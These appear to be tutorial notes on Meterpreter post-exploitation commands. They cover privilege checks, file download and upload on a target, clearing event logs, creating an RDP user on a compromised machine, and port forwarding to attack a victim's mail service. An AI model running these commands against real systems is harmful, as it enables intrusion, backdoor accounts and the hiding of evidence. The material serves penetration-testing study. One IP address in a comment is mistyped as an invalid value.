meterpreter
help # shows help background # puts the current session in background, we can inspect them with # the sesssions command
Once we get onto a machine we generally perform these actions
getuid # what privilege do we have on the remote machine sysinfo # provides info on the target system ps # shows the list of active processes on the target machine shell # drops to a system shell
Once on a system shell, we can go back to our meterpreter session by issuing:
exit
We can manage (e.g., download/upload) files with:
download filename upload filename search filename # searches on the filesystem
From the meterpreter session we can do:
load <module> # we can press tab to check available modules
We can also run specific script generally used in the post-exploitation phase, such as:
run # double tab to list all options run post/linux/gather/checkvm # which checks if the taret machine is a VM
Notice that these post exploitation tools can also be run outside meterpreter if we background the session by setting as option to the script the session id.
We can also clear all the event log by doing:
clearev
Another cool option is to enable RDP on a compromised machine and create a new user, this can be done by typing:
run getgui -u (UID) -p (PASSWD)
Meterpreter Port Forwarding
We can perform port forwarding in metasploit as with SSH tunnels, for example let's say that there is a service available on an attacked machine, we can forward it on our localhost on a custom port, this can be done by doing:
portfwd add -l 1234 -p 25 -r 192.168.1.99 # this will use our port 1234 as a mirror for port 25 on victim ip target # 192.268.1.99 # notice that now we may run exploits on our localhost e.g.,: # ./super_remote_mail_exploit --target 127.0.0.1:1234 # this will attack victim's port 25